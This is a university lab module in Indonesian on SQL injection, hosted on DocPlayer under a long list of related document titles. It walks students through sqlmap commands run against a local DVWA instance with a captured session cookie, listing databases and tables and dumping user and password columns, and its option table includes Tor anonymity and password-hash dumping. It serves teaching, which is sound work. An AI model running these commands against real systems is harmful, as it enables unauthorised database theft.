Modul Praktikum Keamanan Sistem

dokumen-dokumen yang mirip
Modul Praktikum Keamanan Sistem

Modul Praktikum Keamanan Sistem

Modul Praktikum Keamanan Sistem

Modul Praktikum Keamanan Sistem

Xcode Intensif Training. Advanced ethical web. hacking & security

Xcode Intensif Training. Ethical Web hacking & Security ~ Advanced

BAB II LANDASAN TEORI

MODUL 1 PENGENALAN PDO (PHP DATA OBJECT)

Secara umum, eksploit dapat dibagi atas dua jenis, yaitu eksploit lokal (local exploit), dan eksploit remote (remote exploit).

KEAMANAN KOMPUTER APLIKASI HAVIJ KELOMPOK : BAGUS WAHYU SANTOSO KHAIRUL RAHMAN RENDY ZULIANSYAH

PRAKTIKUM 1 PENGENALAN SQL SERVER 2000

LAPORAN TUGAS BASIS DATA I

Pemrograman Basis Data dan SQL

TUGAS KELOMPOK SECURITY COMPUTER TOOL HACKING SQL INJECTION

MODUL VII DATABASE DAN MICROSOFT SQL SERVER 2000

MANUAL VRE GATEWAY

Petunjuk Upload database MySQL menggunakan PhpMyAdmin

Petunjuk Upload Database MySQL

IMPLEMENTASI PHPMYADMIN PADA RANCANGAN SISTEM PENGADMINISTRASIAN

BAB IV IMPLEMENTASI DAN PENGUJIAN

Perancangan Website Ujian. Teknik Elektro UNDIP Berbasis HTML

BAB I PENDAHULUAN. A. Latar Belakang. Kemajuan teknologi informasi yang sangat pesat pada masa

Pertemuan 11 Pengenalan DBMS dan MySQL

Bab 4 Hasil dan Pembahasan

MODUL III STRUCTURED QUERY ANGUAGE (SQL)

BAB II LANDASAN TEORI

Andi Dwi Riyanto, M.Kom

Methods of Manual Penetration Testing (Actual Exploit)

PERTEMUAN 2 DBMS & PERANCANGAN BASIS DATA

PRAKTIKUM BASIS DATA TERDISTRIBUSI MODUL 3 DATABASE LINK DENGAN HETEROENOUS SERVICE

Analisis Penanganan SQL Injection pada Basis Data MySQL dengan Framework Code Igniter dan PHP

Sistem Pendeteksi dan Pencegah Serangan SQL Injection dengan Penghapusan Nilai Atribut Query SQL dan Honeypot

Pengertian dan Fungsi MySql dan SQLyog sebagai Data Base

BAB 1 PENDAHULUAN. satu hal yang sangat dominan dan terjadi dengan sangat pesat. Informasi

Yama Fresdian Dwi Saputro from-engineer.blogspot.com

BAB IV IMPLEMENTASI DAN PENGUJIAN

INSTALLATION CHECKING

Konsep Sistem Informasi B. BAB 2 - SQL Overview

KapitaSelekta. (KBKI82127, 2 sks) Materi : Pengenalan MySQL

BAB I PENDAHULUAN. melainkan hampir semua lembaga dan instansi mulai dari sekolah-sekolah, perguruan

WEB DINAMIS 1 MANAJEMEN DATABASE MYSQL. Agustina Purwatiningsih., S.Kom

DAFTAR ISI 2. PENGENALAN INTERFACE 7 1. PERSIAPAN 3 2. PENGENALAN INTERFACE (MENU) 7

DAFTAR ISI. LEMBAR PENGESAHAN PEMBIMBING... iii. LEMBAR PENGESAHAN PENGUJI... iv. LEMBAR PERNYATAAN KEASLIAN... v. HALAMAN PERSEMBAHAN...

Keamanan Web Server. Pertemuan XI WEB HACKING

BAB IV PENGUJIAN SISTEM. pembuatan VLAN, pengujian terhadap pembuatan monitoring bandwith dan

BAB III ANALISA DAN DESAIN SISTEM

Query adalah bahasa SQL (Structured Query Language) yang ditampilkan dalam bentuk visual, yang dapat digunakan untuk melihat, memodifikasi dan

Nama : FEPILIANA Nim : TUGAS 05 KEAMANAN JARINGAN KOMPUTER ACTUAL EXPLOIT

Spesifikasi: Ukuran: 14x21 cm Tebal: 159 hlm Harga: Rp Terbit pertama: Maret 2005 Sinopsis singkat:

MODUL 6 JDBC (JAVA DATABASE CONNECTIVITY)

Pemrograman Web. Koneksi dan Manipulasi Basis Data. 7 Adam Hendra Brata

Spesifikasi: Ukuran: 11x18 cm Tebal: 144 hlm Harga: Rp Terbit pertama: Juni 2005 Sinopsis singkat:

KEAMANAN USER DATABASE

BAB 4 PERANCANGAN DAN IMPLEMENTASI. menggunakan bahasa pemrograman Java. Perancangan Network Monitoring Tools ini

BAB 1 PENDAHULUAN. berkomunikasi. Hal tersebut dapat dilakukan dengan hanya mengetik alamat ip address

MODUL 8 Mengoperasikan Perangkat Lunak Basis Data

SISTEM BASIS DATA By Novareza Klifartha

Modul 4 Microsoft Access 2007

BAB III LANDASAN TEORI. layanan (service) tertentu dalam sebuah jaringan komputer. Server. sebagai sistem operasi jaringan (network operating system).

TUGAS KEAMANAN JARINNGAN KOMPUTER

APLIKASI KOMPUTER. Pokok Bahasan : MS. Access 2010 (Bagian 1) Anggun Puspita Dewi, S.Kom., MM. Modul ke: Fakultas MKCU

SQL. Pemrograman Web II. Ganjil

BAB 1 PENDAHULUAN. 1.1 Latar Belakang

LAPORAN RESMI PRAKTIKUM KEAMANAN DATA LAPORAN RESMI KONFIGURASI KEAMANAN LAYANAN PROXY PROXY RADIUS

BAB 1 PENDAHULUAN. perubahan kultur kita sehari-hari. Dalam era yang disebut information age ini, media

Modul Analisa Video Streaming dengan HTML 5

BAB II LANDASAN TEORI

ADITYA WARDANA

BAB IV PENGUMPULAN DAN PENGOLAHAN DATA. Untuk pengumpulan data ini penulis menggunakan program bernama

Pemrograman Web. PHP State, Session dan Cookies. Adam Hendra Brata

IMPLEMENTASI KEAMANAN APLIKASI WEB DENGAN WEB APPLICATION FIREWALL

DASAR-DASAR SQL SERVER 2005


Kata Pengantar.. i. Daftar Isi.. ii. Cara Menggunakan CD Pendukung... Bab 1 Pendahuluan Memulai Visual Basic... 1

Basis Data Adalah.. Kumpulan file/table/arsip yang saling berhubungan yang disimpan dalam media penyimpanan elektronis

3.3.7 Membuat Form Profil Perusahaan Membuat From Produksi Membuat Form Laporan... 62

BAB III PEMBAHASAN 3.1 Analisa Sistem

Database bisa dikatakan sebagai suatu kumpulan dari data yang tersimpan dan diatur atau

Menampilkan Data/Tabel MySQL di Ms.Access

SISTEM BASIS DATA II S A N T I W I D I A N T I

APLIKASI PEMANTAUAN KERJA BERBASIS WEB

BAB II KAJIAN PUSTAKA

PROGRAM STUDI D3 JURUSAN TEKNIK KOMPUTER POLITEKNIK NEGERI SRIWIJAYA PALEMBANG Praktikum Basis Data Terapan 2

Tahap-tahap menginstall ORACLE 10g

BAB III PERANCANGAN SISTEM

MODUL 4 PHP PART 1 (PENGENALAN PHP + VARIABEL)

JURUSAN SISTEM KOMPUTER FAKULTAS ILMU KOMPUTER UNIVERSITAS SRIWIJAYA

Bab 2 Tinjauan Pustaka

MODUL 3 IMPORT DATA DARI MAPINFO KE DATABASE. Praktikan dapat mengetahui cara meng-inport data dari MapInfo ke database pada PostgreSQL.

DATABASE SQL SERVER. Database SQL Server Halaman 1

Praktikum 13 Konfigurasi Keamanan Layanan Proxy

1. Buka aplikasi xampp jika belum punya aplikasi xampp bisa terlebih dahulu mendownload aplikasi xampp.

BELAJAR DENGAN XAMPP MySQL

INSTALLATION GUIDE INSTALLATION GUIDE. PT.Technomatic Cipta Mandiri. IT division: Jl. Cikutra Baru Raya No.2 Bandung-40124

Sebelum kita membahas tentang Microsoft Access ada baiknya jika kita terlebih dahulu mengetahui apa yang dimaksud dengan database.

Implementasi Algoritma Kriptografi XXTEA untuk Enkripsi dan Dekripsi Query Database pada Aplikasi Online Test (Studi Kasus : SMK Immanuel Pontianak)

BAB IV IMPLEMENTASI DAN PENGUJIAN

Mengeksplorasi Database PostgreSQL dengan PgAdmin III

6 PENGANTAR MANAJEMEN DATA

BAB V IMPLEMENTASI SISTEM

Transkripsi:

2016 Modul Praktikum Keamanan Sistem LABORATORIUM SECURITY SY STEM Hanya dipergunakan di lingkungan Fakultas Teknik Elektro K K KEAMANAN SISTEM FAKULTAS TEKNIK ELEKTRO UNIVERSITAS TELKOM

DAFTAR PENYUSUN Yudha Purwanto,S.T.,M.T. Surya MIchrandi Nasution,S.T.,M.T. Dll Modul Praktikum Keamanan Sistem 1

LEMBAR PERNYATAAN Yang bertanda tangan dibawah ini : Nama : Surya Michrandi Nasution,S.T.,M.T. NIK : 13861155-1 Jabatan : Dosen Pembina Laboratorium Security System Menerangkan dengan sesungguhnya bahwa modul praktikum ini telah direview dan akan digunakan untuk pelaksanaan praktikum di Semester 5 Tahun Akademik 2016/2017 di Laboratorium Rangkaian Listrik Fakultas Teknik Elektro Universitas Telkom Bandung, 10 Agustus 2016 Mengetahui, Dosen Pembina Lab Ketua Kelompok Keahlian Security System Yudha Purwanto,S.T.,M.T. Surya Michrandi Nasution,S.T.,M.T. NIK 02770281-1 NIK 13681155-1 Modul Praktikum Keamanan Sistem 2

Visi & Misi Fakultas Teknik Elektro VISI: Menjadi fakultas unggul berkelas dunia yang berperan aktif pada pengembangan ilmu pengetahuan dan teknologi elektro serta fisika, berbasis teknologi informasi dan komunikasi. MISI: 1. Menyelenggarakan pendidikan tinggi dan pendidikan berkelanjutan berstandar internasional 2. Mengembangkan, menyebarluaskan, dan memanfaatkan ilmu pengetahuan dan teknologi bidang teknik telekomunikasi, teknik komputer, fisika teknik, dan elektroteknik, serta bekerja sama dengan industri/institusi, guna meningkatkan kesejahteraan dan kemajuan masyarakat. 3. Mengembangkan dan membina jejaring dengan perguruan tinggi dan industri terkemuka dalam dan luar negeri dalam rangka kerjasama pendidikan dan penelitian. 4. Mengembangkan sumberdaya untuk mencapai keunggulan dalam pembelajaran, penelitian dan pengabdian kepada masyarakat. Modul Praktikum Keamanan Sistem 3

Visi & Misi Fakultas Teknik Elektro VISI: Menjadi program studi berstandar internasional dan menghasilkan sarjana berkeahlian Sistem Elektronika, Sistem Kendali, atau Teknik Biomedika MISI: 1. Menyelenggarakan pendidikan berstandar internasional untuk menghasilkan lulusan yang menguasai ilmu pengetahuan dan teknologi Sistem Elektronika, Sistem Kendali, atau Teknik Biomedika; 2. Mengembangkan dan menyebarluaskan ilmu pengetahuan dan teknologi Sistem Elektronika, Sistem Kendali, dan Teknik Biomedika yang diakui secara internasional dengan melibatkan mahasiswa secara aktif; 3. Memanfaatkan ilmu pengetahuan dan teknologi Sistem Elektronika, Sistem Kendali, dan Teknik Biomedika untuk kesejahteraan dan kemajuan peradaban bangsa. Modul Praktikum Keamanan Sistem 4

ATURAN LABORATORIUM FAKULTAS TEKNIK ELEKTRO TELKOM UNIVERSITY Setiap Mahasiswa Fakultas Teknik Elektro yang akan menggunakan Fasilitas Laboratorium, WAJIB mematuhi Aturan sebagai berikut : 1. Menggunakan seragam resmi Telkom University, dan Membawa Kartu Tanda Mahasiswa (KTM) yang masih berlaku. 2. Tidak berambut gondrong untuk mahasiswa 3. Dilarang merokok dan makan minum didalam ruangan, dan membuang sampah pada tempatnya 4. Dilarang menyimpan barang-barang milik pribadi di Laboratorium tanpa seijin Fakultas 5. Dilarang menginap di Laboratorium tanpa seijin Fakultas 6. Jam Kerja Laboratorium dan Ruang Riset adalah 06.30 WIB sampai 22.00 WIB 7. Mahasiswa yang akan menggunakan Laboratorium dan atau ruang riset diluar jam kerja, harus mengajukan ijin kepada Fakultas Dekan Fakultas Teknik Elektro Bandung,.. Juli 2014 Dr. Rina Pudjiastuti, Ir., MT. Modul Praktikum Keamanan Sistem 5

Modul 3 : SQL injection 0.1 Tujuan Setelah mengikuti praktikum ini mahasiswa diharapkan dapat: 1. Mengetahui apa itu SQL Injection 2. Mengetahui beberapa cara melakukan SQL Injection 0.2 Alat & Bahan 1. Komputer PC Dasar Teori 1. SQL SQL (Structured Query Language) SQL digunakan untuk berkomunikasi dengan database. SQL adalah bahasa standar untuk sistem manajemen basis data relasional. Pernyataan SQL digunakan untuk melakukan tugas seperti update data pada database, atau mengambil data dari database. 2. SQL Injection Injeksi SQL atau SQL Injection adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. Modul Praktikum Keamanan Sistem 6

Exploitasi Sebelum mulai akan dijelaskan sedikit mengenai tool yang akan kita gunakan, dalam pembahasan ini kita akan menggunakan tool Sqlmap Beberapa Feature dari Sqlmap sebagai berikut: Support database MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix. Full support untuk 6 teknik SQL injection: boolean-based blind, time-based blind, errorbased, UNION query-based, stacked queries and out-of-band. Langsung terkoneksi dengan database tanpa melalui SQL injection, Dengan menyediakan kredensial DBMS, alamat IP, port dan nama database. Pengenalan Password format hash secara otomatis and support untuk cracking dengan menggunakan dictionary-based attack. Bisa melakukan Dump isi dari sebuah database. SQLmap adalah program opensource yang di buat dari Python untuk melakukan proses mendeteksi dan mengexploit celah keamanan SQL secara otomatis Modul Praktikum Keamanan Sistem 7

Setelah mengetahui Kegunaan dari Sqlmap kita lanjut ke praktikum,kali ini kita akan mengambil isi table dari sebuah website local dengan menggunakan Sqlmap Pertama kita perlu mencari url yang bisa di exploit dengan mencari url yang di gunakan untuk query server melalui tamper data Catatan : Browser memerlukan Extension Tamper data untuk melihat url query server Klik Start Temper lalu masukan 1 dan submit pada website Modul Praktikum Keamanan Sistem 8

Setelah Submit data Copy isi Referer dan COOKIE ke dalam notepad, Referer akan di gunakan sebagai Url Masuk dan COOKIE sebagai Credential COOKIE di sini di ambil untuk mendapatkan session agar sqlmap bisa melakukan injeksi melalui session yang sudah ada, COOKIE pada umumnya menyimpan pengaturan atau preferensi dari situs berangkutan ddengan COOKIE situs dapat menampilkan informasi yang sesuai dengan pengaturan computer, umumnya COOKIE menyimpan data session user dan informai yang terkait user tersebut, di sini cookie menyimpan data PHPSESSID yaitu session user dan juga tingkat security level dari website Masukan Referer dan COOKIE untuk melihat isi database Python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="phpsessid=t3cdvsu9cqn8kafoseegh5esqe; security=low" --dbs Modul Praktikum Keamanan Sistem 9

Berikut Adalah Isi Database yang ada di dalam website Setelah mendapatkan table kita akan mencari Tabel isi dari Database dvwa Python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="phpsessid=t3cdvsu9cqn8kafoseegh5esqe; security=low" -D dvwa --tables Berikut Tabel Isi dari Database dvwa Setelah mendapatkan semua table kita akan mencari kolom dari table Python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="phpsessid=t3cdvsu9cqn8kafoseegh5esqe; security=low" -D dvwa -T users --columns Modul Praktikum Keamanan Sistem 10

Setelah kita tahu bentuk isi dari Databse sekarang kita akan melakukan dump isi dari table Python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&submit=submit" -- cookie="phpsessid=t3cdvsu9cqn8kafoseegh5esqe; security=low" -D dvwa -T users -C user,password --dump Berikut merupakan isi colom user dan password Modul Praktikum Keamanan Sistem 11

Perintah Fungsi -h /--help Menampilkan menu Help pada Sqlmap -d Melakukan Koneksi database langsung -u Target Alamat -m Scan banyak target yang ada di dalam file text -c Menampilkan option dari configuration INI file --cookie Memasukan Header HTTP cookie --referer Memasukan Header HTTP referer --tor Menggunakan tor untuk anonimitas network --hostname Menampilkan hostname dari server --users Menampilkan Users database --passwords Menampilkan password hash pada database --dbs Memunculkan database --columns Memunculkan columns dalam databse --tables Memunculkan tables dalam database --dump Melakukan dump dari database table yang dipilih --dump-all Melakukan dump dari semua database table --search Mencari columns, table, dan/atau nama database --update Update sqlmap Modul Praktikum Keamanan Sistem 12

2024 © DocPlayer.info Pengaturan dan alat privasi | Ketentuan | Tanggapan